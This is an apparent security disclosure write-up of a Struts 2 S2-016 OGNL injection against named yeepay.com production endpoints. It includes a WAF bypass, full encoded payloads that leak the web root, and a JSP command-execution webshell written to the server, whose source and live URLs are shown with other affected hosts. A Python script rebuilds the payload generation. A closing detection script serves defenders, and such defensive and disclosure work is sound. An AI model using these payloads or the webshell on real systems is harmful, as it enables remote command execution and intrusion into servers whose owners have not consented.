http://www.yeepay.com/individualservice/Login.action

Seeing the .action suffix, I tested for the Struts 2 action-prefix injection (the redirect: / redirectAction: prefix issue, S2-016) out of habit:

http://www.yeepay.com/individualservice/Login.action?redirect:/xxoo
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 08:34:12 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/xxoo
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 8:49:12 GMT; path=/
It redirected to the attacker-chosen path, so the prefix is being evaluated. I went straight for a command-execution exploit, only to find that a WAF blocked it.
Not giving up, I kept probing. The WAF turned out to filter allowStaticMethodAccess and processBuilder, so command execution through the usual exploits was out; the next question was whether a file could be written instead.

http://www.yeepay.com/individualservice/Login.action?java.io.File ---> is OK
http://www.yeepay.com/individualservice/Login.action?java.io.PrintWriter ---> is OK

File operations are let through. Evidently the WAF rules were built from keywords lifted out of the public command-execution exploits, and java.io.File / java.io.PrintWriter were never on that list. So on to writing a shell.

0x1 Finding the web directory

The ServletContext attribute org.apache.catalina.jsp_classpath contains the deployment path of the application, so the web root can be read out of it. The result comes back in the Location header, and because the yeepay container is JBoss, which seems to limit URL length, the value has to be sliced with substring() (my local Tomcat test had no such limit). First locate the offset of "individualservice" in the classpath:
http://www.yeepay.com/individualservice/Login.action?redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).indexOf(%22individualservice%22)}

HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 08:55:06 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/8232
Content-Language: zh-CN
The offset is 8232, so request a substring window around it:
curl -i http://www.yeepay.com/individualservice/Login.action -d 'redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).substring(8100,8400)}'

HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 10:01:42 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/efault/tmp/deploy/tmp4813126319445231330servlets-default.jar:/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/:/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/:/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar:/export/home/jboss-4.0.3SP1/server/default/lib
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=186558656.36895.0000; expires=Sat, 20-Dec-2014 10:16:42 GMT; path=/
The web directory is the exploded .war entry in that slice:

/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war

0x2 Writing the shell
curl -i 'http://www.yeepay.com/individualservice/Login.action' -d 'redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/lala.jsp%22)),%23a.write(%27%3C%25%40%20page%20import%3D%22java.io.*%22%20%25%3E%20%3C%25%20String%20cmd%20%3D%20request.getParameter(%22cmd%22)%3B%20String%20output%20%3D%20%22%22%3B%20if(cmd%20!%3D%20null)%20%7B%20String%20s%20%3D%20null%3B%20try%20%7B%20Process%20p%20%3D%20Runtime.getRuntime().exec(cmd)%3B%20BufferedReader%20sI%20%3D%20new%20BufferedReader(new%20InputStreamReader(p.getInputStream()))%3B%20while((s%20%3D%20sI.readLine())%20!%3D%20null)%20%7B%20output%20%2B%3D%20s%20%2B%22%5C%5Cr%5C%5Cn%22%3B%20%7D%20%7D%20catch(IOException%20e)%20%7B%20e.printStackTrace()%3B%20%7D%20%7D%20%25%3E%20%3Cpre%3E%20%3C%25%3Doutput%20%25%3E%20%3C%2Fpre%3E%27),%23a.close())%2b%23a}'

HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 10:04:00 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/nulljava.io.PrintWriter@1517394
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 10:19:00 GMT; path=/

Percent-decoded, the POST body is this OGNL expression: open a PrintWriter on the path found in 0x1, write the JSP source as a single-quoted OGNL string, close the writer.

redirect:${(#a=(new java.io.PrintWriter("/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/lala.jsp")),#a.write('<JSP source>'),#a.close())+#a}

The JSP source being written (one line in the payload, broken up here for readability; the \\r\\n is the OGNL-escaped form of "\r\n"):

<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  String output = "";
  if(cmd != null) {
    String s = null;
    try {
      Process p = Runtime.getRuntime().exec(cmd);
      BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
      while((s = sI.readLine()) != null) { output += s +"\\r\\n"; }
    } catch(IOException e) { e.printStackTrace(); }
  }
%>
<pre> <%=output %> </pre>

The redirect target nulljava.io.PrintWriter@1517394 confirms that the expression ran: a comma-separated OGNL sequence evaluates to its last element, #a.close() yields null, and +#a appends the writer's toString().
Shell address: http://www.yeepay.com/individualservice/lala.jsp
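The two request-building steps of 0x1 and 0x2, reproduced offline as an added example (my code, not part of the original report). It builds the percent-encoded redirect: payload the report sends, generates the indexOf()/substring() expressions and the PrintWriter write expression, and parses a classpath slice for the exploded .war directory. The OGNL fragments are the report's; the helper names, the window size and the padded SAMPLE_CLASSPATH are my assumptions (the entry order and the .war path in the sample are copied from the leaked slice above, the padding is constructed so the app name sits at a large offset as on the real JBoss host).

```python
"""Offline reconstruction of the classpath lookup (0x1) and file write (0x2).
Added example; not the report's code. No network access, nothing is sent anywhere."""
from typing import Optional
from urllib.parse import quote

APP_KEY = "org.apache.catalina.jsp_classpath"   # ServletContext attribute the report reads


def redirect_payload(ognl: str) -> str:
    """Wrap an OGNL expression in the Struts 2 redirect: action prefix (S2-016) and
    percent-encode it; safe="" turns # into %23 and ' into %27 as in the report's requests."""
    return "redirect:" + quote("${" + ognl + "}", safe="")


def classpath_index_expr(app: str) -> str:
    """0x1, request 1: offset of the app name inside the container classpath."""
    return f"#application.get('{APP_KEY}').indexOf(\"{app}\")"


def classpath_slice_expr(start: int, end: int) -> str:
    """0x1, request 2: a slice short enough to come back in the Location header."""
    return f"#application.get('{APP_KEY}').substring({start},{end})"


def write_file_expr(path: str, content: str) -> str:
    """0x2: the report's PrintWriter write. The file body is escaped as an OGNL
    single-quoted string literal (backslash and single quote are what matters);
    the trailing +#a makes the redirect target show the writer's toString()."""
    body = content.replace("\\", "\\\\").replace("'", "\\'")
    return (f"(#a=(new java.io.PrintWriter(\"{path}\")),"
            f"#a.write('{body}'),#a.close())+#a")


def webroot_from_slice(window: str, app: str) -> Optional[str]:
    """Parse the colon-separated slice the server echoed and return the exploded .war
    directory for `app`. An entry cut off at either edge of the slice will not end in
    '.war/' and is skipped; None means the substring window must be widened."""
    for entry in window.split(":"):
        if entry.endswith(".war/") and entry.split("/")[-2] == f"{app}.war":
            return entry.rstrip("/")
    return None


# Constructed sample classpath (assumption); on the real host the app name sat at 8232.
_PADDING = "/export/home/jboss-4.0.3SP1/lib/jboss-common.jar:" * 160
SAMPLE_CLASSPATH = _PADDING + ":".join([
    "/export/home/jboss-4.0.3SP1/server/default/tmp/deploy/tmp4813126319445231330servlets-default.jar",
    "/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/",
    "/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/",
    "/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar",
    "/export/home/jboss-4.0.3SP1/server/default/lib",
])


def simulate_webroot_lookup(classpath: str, app: str, margin: int = 150) -> Optional[str]:
    """Run the two-request procedure against a local string: what indexOf() would leak,
    then what substring() would leak for a +/- margin window around that offset."""
    idx = classpath.find(app)                                 # leaked by request 1
    if idx < 0:
        return None
    window = classpath[max(0, idx - margin): idx + margin]    # leaked by request 2
    return webroot_from_slice(window, app)


if __name__ == "__main__":
    print(redirect_payload(classpath_index_expr("individualservice")))
    root = simulate_webroot_lookup(SAMPLE_CLASSPATH, "individualservice")
    print(root)
    print(redirect_payload(write_file_expr(f"{root}/lala.jsp", "<%= 1+1 %>")))
```

With the default margin the sample returns the .war directory; with a margin of 10 the slice cuts the entry in half and the function returns None, which is the case that forces a second, wider substring() request.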
Other applications affected by the same issue:

http://www.yeepay.com/selfservice/requestRegister.action
http://m.yeepay.com/donategroup/PrintDonateCert.action
http://gongyi.yeepay.com/mlove/showMediaInfo.action
http://zht.yeepay.com/zhtservice/login.action
http://www.yeepay.com/individualservice/lala.jsp?cmd=id
http://zht.yeepay.com/zhtservice/lala.jsp?cmd=/sbin/ifconfig
http://m.yeepay.com/boss_donategroup/test.txt
http://m.yeepay.com/donategroup/test.txt
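The lesson of this report for the defending side is that the WAF matched exploit keywords (allowStaticMethodAccess, processBuilder) and so let a payload built from java.io.PrintWriter through. As an added example (my code, not part of the original report), here is a request check that keys on the shape of the injection instead: a Struts 2 action-prefix parameter (redirect:, redirectAction:, action:) carrying an OGNL expression, plus context-map and Java class references anywhere in the fully percent-decoded parameters. The rule names and the sample requests are mine; the payload texts in the samples are the report's own, shortened.

```python
"""Shape-based check for Struts 2 action-prefix OGNL injection (added example,
not the report's code). Works on a query string or form body, offline."""
import re
from urllib.parse import unquote

ACTION_PREFIX = re.compile(r"(?:^|[?&])(?:redirect|redirectAction|action):", re.I)
OGNL_EXPR = re.compile(r"[$%]\{")                       # ${...} or %{...}
OGNL_CONTEXT = re.compile(r"#(?:application|context|request|session|parameters|_memberAccess)\b")
JAVA_CLASS = re.compile(r"\bjava\.(?:io|lang|nio)\.[A-Z]\w*")   # java.io.PrintWriter etc.


def decode_fully(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable, so a double-encoded %2524%257B is seen as ${."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def classify(params: str) -> list:
    """Return the rule names a query string or form body trips; empty list means clean."""
    p = decode_fully(params)
    hits = []
    if ACTION_PREFIX.search(p):
        hits.append("struts-action-prefix")             # bare redirect:/... probe
        if OGNL_EXPR.search(p):
            hits.append("struts-action-prefix-ognl")    # S2-016 injection shape
    if OGNL_CONTEXT.search(p):
        hits.append("ognl-context-access")              # #application, #context, ...
    if JAVA_CLASS.search(p):
        hits.append("java-class-reference")             # the File/PrintWriter bypass
    return hits


# Constructed samples: the first four follow the report's requests, the last two are benign.
SAMPLES = {
    "probe":        "redirect:/xxoo",
    "classpath":    "redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27)"
                    ".indexOf(%22individualservice%22)}",
    "write_shell":  "redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/tmp/lala.jsp%22)),"
                    "%23a.write(%27x%27),%23a.close())%2b%23a}",
    "double_enc":   "redirect%3A%2524%257B%2523application%257D",
    "benign_redir": "username=alice&redirectUrl=%2Fhome",
    "benign_brace": "q=%24%7Bprice%7D",
}


def scan(samples=SAMPLES) -> dict:
    """Classify every sample; returns {name: [rules tripped]}."""
    return {name: classify(body) for name, body in samples.items()}


if __name__ == "__main__":
    for name, hits in scan().items():
        print(f"{name:13s} {hits or 'clean'}")
```

The benign samples show why the check does not fire on braces or on a parameter merely named redirectUrl. On the response side, the matching signal is a 302 whose Location path carries an evaluation result, such as the classpath fragment or nulljava.io.PrintWriter@1517394 seen above.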